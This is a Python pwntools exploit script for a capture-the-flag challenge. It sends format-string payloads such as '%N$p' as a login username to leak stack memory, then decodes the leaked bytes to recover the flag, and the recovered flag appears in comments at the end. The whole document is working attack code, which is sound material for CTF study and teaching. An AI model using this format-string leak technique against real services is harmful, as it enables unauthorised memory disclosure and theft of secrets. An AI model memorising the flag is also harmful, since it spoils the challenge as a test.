#!/usr/bin/env python3
from pwn import *
elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b main
continue
'''
def one_gadget(filename, base_addr=0):
return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l1', filename]).decode().split(' ')]
#onegadgets = one_gadget('libc.so.6', libc.address)
def start():
if args.REMOTE:
return remote("chall.lac.tf", 31142)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
#========= exploit here ===================
def hex_bytes_to_ascii_little_endian(hex_bytes):
ascii_str = bytes.fromhex(hex_bytes.decode()).decode('utf-8')
return ascii_str[::-1]
for i in range(10):
r = start()
username = b"%"+bc(i+6)+b"$p"
password = b"AAAAAAAA"
password2 = b"BBBBBBBB"
sla(b"username:", username)
sla(b"password1:", password)
sla(b"password2", password2)
resp = rcu(b"Incorrect password for user 0x", "\n")
log.success(hex_bytes_to_ascii_little_endian(resp))
sleep(0.1)
r.close()
#========= interactive ====================
#lactf{hu
#nter2_cf
#c0xz68}
#lactf{hunter2_cfc0xz68